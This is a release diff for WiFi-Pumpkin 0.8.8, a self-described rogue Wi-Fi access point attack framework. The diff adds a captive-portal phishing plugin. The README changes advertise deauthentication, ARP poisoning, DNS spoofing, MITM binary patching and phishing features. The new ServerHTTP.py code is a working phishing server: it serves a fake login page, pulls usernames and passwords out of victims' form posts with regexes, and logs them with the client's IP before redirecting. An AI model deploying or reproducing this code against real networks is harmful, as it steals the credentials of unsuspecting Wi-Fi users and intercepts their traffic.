released 0.8.8

released 0.8.8 is out

Author: mh4x0f

CHANGELOG

@@ -1,3 +1,8 @@
+Version 0.8.8
+-------------
+- added new moduled captive portal plugin
+- fixed TypeError: SetRules method
+
 Version 0.8.7
 -------------
 - modularized and auto loaded proxy package

README.md

@@ -1,15 +1,15 @@
 ![logo](https://raw.githubusercontent.com/P0cL4bs/WiFi-Pumpkin/master/docs/logo.png)
 
 [![build](https://travis-ci.org/P0cL4bs/WiFi-Pumpkin.svg)](https://travis-ci.org/P0cL4bs/WiFi-Pumpkin/)
-![version](https://img.shields.io/badge/version-0.8.7-orange.svg)
+![version](https://img.shields.io/badge/version-0.8.8-orange.svg)
 
 WiFi-Pumpkin - Framework for Rogue Wi-Fi Access Point Attack
 
 ### Description
 
 The WiFi-Pumpkin is a rogue AP framework to easily create these fake networks, all while forwarding legitimate traffic to and from the unsuspecting target. It comes stuffed with features, including rogue Wi-Fi access points, deauth attacks on client APs, a probe request and credentials monitor, transparent proxy, Windows update attack, phishing manager, ARP Poisoning, DNS Spoofing, Pumpkin-Proxy, and image capture on the fly. moreover, the WiFi-Pumpkin is a very complete framework for auditing Wi-Fi security check the list of features is quite broad.
 
-![screenshot](https://raw.githubusercontent.com/P0cL4bs/WiFi-Pumpkin/0.8.7Beta/docs/screenshot.png)
+![screenshot](https://raw.githubusercontent.com/P0cL4bs/WiFi-Pumpkin/master/docs/screenshot.png)
 
 ### Installation
 
@@ -24,7 +24,7 @@ The WiFi-Pumpkin is a rogue AP framework to easily create these fake networks, a
 or download [.deb](https://github.com/P0cL4bs/WiFi-Pumpkin/releases) file to install
 
 ```sh
-sudo dpkg -i wifi-pumpkin-0.8.7-all.deb
+sudo dpkg -i wifi-pumpkin-0.8.8-all.deb
 sudo apt-get -f install # force install dependencies if not install normally
 
 ```
@@ -52,13 +52,10 @@ refer to the wiki for [Installation](https://github.com/P0cL4bs/WiFi-Pumpkin/wik
 - TCP-Proxy (with [scapy](http://www.secdev.org/projects/scapy/))
 - Moduled plugins and proxys
 - Wireless Mode support hostapd-mana/hostapd-karma attacks
+- Capitve-portals [new]
 
 ### Donation
 
-##### Patreon:
-
-[![Patreon](https://cloud.githubusercontent.com/assets/8225057/5990484/70413560-a9ab-11e4-8942-1a63607c0b00.png)](http://www.patreon.com/wifipumpkin)
-
 ##### paypal:
 
 [![donate](https://www.paypalobjects.com/en_US/i/btn/btn_donate_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=PUPJEGHLJPFQL)
@@ -76,6 +73,8 @@ refer to the wiki for [Installation](https://github.com/P0cL4bs/WiFi-Pumpkin/wik
 | [Sergio_proxy](https://github.com/supernothing/sergio-proxy) | Sergio Proxy (a Super Effective Recorder of Gathered Inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework. |
 | [BDFProxy](https://github.com/davinerd/BDFProxy-ng)          | Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy @secretsquirrel.                |
 | [Responder](https://github.com/lgandx/Responder)             | Responder an LLMNR, NBT-NS and MDNS poisoner. Author: Laurent Gaffie                                                                            |
+| [PumpkinProxy]()                                             | Intercepting HTTP data, this proxy server that allows to intercept requests and response on the fly
+| [CaptivePortals]()                                          | Captive-Portal allow the Attacker block Internet access for users until they open the page login page where a password is required before being allowed to browse the web. | 
 
 ### Transparent Proxy
 
@@ -197,6 +196,12 @@ class ExamplePlugin(PSniffer):
 
 [TCP-Proxy](https://github.com/P0cL4bs/WiFi-Pumpkin/wiki/TCP-PProxy) on the wiki
 
+#### About Captive Portals
+
+the plugin Captive-Portal allow the Attacker mount a wireless access point which is used in conjuction with a web server and iptables traffic capturing rules to create the phishing portal. Users can freely connect to these networks without a password and will often be directed to a login page where a password is required before being allowed to browse the web.
+
+[Captive-portals](https://github.com/mh4x0f/captiveportals) on the wiki
+
 ### Screenshots
 
 [Screenshot](https://github.com/P0cL4bs/WiFi-Pumpkin/wiki/Screenshots) on the wiki

core/config/app/captive-portal.ini

@@ -0,0 +1,10 @@
+[plugins]
+FlaskDemo=true
+Login_v4=false
+loginPage=false
+DarkLogin=false
+
+[set_FlaskDemo]
+Default=true
+En=false
+ptBr=false

core/config/app/config.ini

@@ -127,6 +127,7 @@ Pumpkin%20Proxy=true
 BDF%20Proxy=false
 No%20Proxy=false
 TCP%20Proxy=true
+Captive%20Portal=false
 
 [iptables]
 iptables_0_masq=iptables -P FORWARD ACCEPT

core/config/commits/Lcommits.cfg

@@ -1,4 +1,10 @@
 master:
+[
+  {	Version: '0.8.8'}
+  { changelog : 'added new moduled captive portal plugin' },
+]
+
+WiFiPumpkin087:
 [
   {	Version: '0.8.7'}
   { changelog : 'fixed version beta alert and constants' },

core/main.py

@@ -44,7 +44,7 @@
     for mount Access point.
 
 Copyright:
-    Copyright (C) 2015-2017 Marcos Nesster P0cl4bs Team
+    Copyright (C) 2015-2019 Marcos Bomfim (Nesster) P0cl4bs Team
     This program is free software: you can redistribute it and/or modify
     it under the terms of the GNU General Public License as published by
     the Free Software Foundation, either version 3 of the License, or
@@ -63,8 +63,8 @@
 author      = 'Marcos Nesster (@mh4x0f)  P0cl4bs Team'
 emails      = ['[email protected]','[email protected]']
 license     = ' GNU GPL 3'
-version     = '0.8.7'
-update      = '10/21/2018'
+version     = '0.8.8'
+update      = '04/06/2019'
 desc        = ['Framework for Rogue Wi-Fi Access Point Attacks']
 
 class Initialize(QtGui.QMainWindow):

core/servers/http_handler/ServerHTTP.py

@@ -1,6 +1,6 @@
 from PyQt4.QtCore import QThread,pyqtSignal
 from core.utils import setup_logger
-from core.utility.constants import LOG_PHISHING
+from core.utility.constants import LOG_PHISHING,LOG_CAPTIVEPORTALPROXY
 import SimpleHTTPServer
 import BaseHTTPServer
 import SocketServer
@@ -9,6 +9,7 @@
 import logging
 import socket
 import cgi
+import re
 
 
 class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
@@ -123,4 +124,121 @@ def stop(self):
         try:
             self.httpd.shutdown()
             self.httpd.server_close()
-        except AttributeError: pass
+        except AttributeError: pass
+
+
+
+class ThreadCaptivePortalHTTPServer(QThread):
+    ''' server http for website custom module Phishing '''
+    requestCredentails = pyqtSignal(object)
+    requestLogin = pyqtSignal(object)
+    def __init__(self,Address,PORT,plugin=None,session=str()):
+        self.Address,self.PORT = Address,PORT
+        self.session = session
+        self.Handler = ServerHandlerCaptivePortal
+        self.Handler.redirect_Original_website = plugin.Redirect
+        self.Handler.redirect_Path = plugin.TemplatePath
+        QThread.__init__(self)
+
+    def run(self):
+        self.httpd = None
+        #self.httpd = MyHTTPServer((self.Address, self.PORT), self.Handler,on_before_serve = self.httpd)
+        self.Handler.log_message_creds = self.Method_POST_DATA
+        self.Handler.log_message_post = self.Mehtod_POST_LOG
+        setup_logger('captivePortal', LOG_CAPTIVEPORTALPROXY, key=self.session)
+        self.log_captiveportal = logging.getLogger('captivePortal')
+        #self.httpd.serve_forever()
+
+    def Method_POST_DATA(self,format, *args):
+        self.log_captiveportal.info(list(args)[0])
+        self.requestCredentails.emit(list(args)[0])
+
+    def Mehtod_POST_LOG(self, format, *args):
+        self.requestLogin.emit(list(args)[0])
+
+    def stop(self):
+        try:
+            self.httpd.shutdown()
+            self.httpd.server_close()
+        except AttributeError: pass
+
+
+
+class ServerHandlerCaptivePortal(SimpleHTTPServer.SimpleHTTPRequestHandler):
+    ''' server http for website clone module Phishing'''
+    redirect_Original_website,redirect_Path = None,None
+    
+    def do_GET(self):
+        if self.path =='/':self.path = self.redirect_Path
+        if self.path.startswith('/'): self.path = self.redirect_Path + self.path
+        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
+
+    def log_message_creds(self, format, *args):
+        return
+
+    def log_message_post(self, format, *args):
+        return
+
+    def log_message(self, format, *args):
+        return
+
+    def redirect(self, page="/"):
+
+        # https://stackoverflow.com/questions/7160737/python-how-to-validate-a-url-in-python-malformed-or-not
+        regex = re.compile(r'^(?:http|ftp)s?://' # http:// or https://
+        r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' #domain...
+        r'localhost|' #localhost...
+        r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip
+        r'(?::\d+)?' # optional port
+        r'(?:/?|[/?]\S+)$', re.IGNORECASE)
+
+        if  re.match(regex, page):
+            if not page.startswith('http://'):
+                page = 'http://' + page
+            self.send_response(301)
+            self.send_header('Location', page)
+            self.end_headers()
+        else:
+            self.path = self.redirect_Path + self.path + self.redirect_Original_website
+
+    def do_POST(self):
+        redirect = False
+        
+        try:
+            content_length = int(self.headers['Content-Length']) 
+            post_data = self.rfile.read(content_length) 
+            print(post_data)
+
+
+            user_regex = '([Ee]mail|%5B[Ee]mail%5D|[Uu]ser|[Uu]sername|' \
+            '[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&|;]*)'
+            pw_regex = '([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][Ss][Ww]|' \
+            '[Pp]asswrd|[Pp]assw|%5B[Pp]assword%5D)=([^&|;]*)'
+            username = re.findall(user_regex, post_data)
+            password = re.findall(pw_regex, post_data)
+
+            if not username ==[] and not password == []:
+                self.log_message_creds('',{'CaptiveCreds':{'User':username[0][1],
+                'Pass': password[0][1], 'Client': self.client_address[0]}})
+                redirect = True
+        except:
+            pass
+
+        # form = cgi.FieldStorage(
+        #     fp=self.rfile,
+        #     headers=self.headers,
+        #     environ={'REQUEST_METHOD':'POST',
+        #     'CONTENT_TYPE':self.headers['Content-Type'],
+        #     }
+        # )
+
+        # if not form.list: return
+        # redirect = True
+        # for item in form.list:
+        #     if item.name and item.value:
+        #         self.log_message('',item.name+' : '+item.value)
+        if redirect:
+             # send confirmation the cliente this to access to server
+            self.log_message_post('', self.client_address[0])
+            self.redirect(self.redirect_Original_website)
+        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)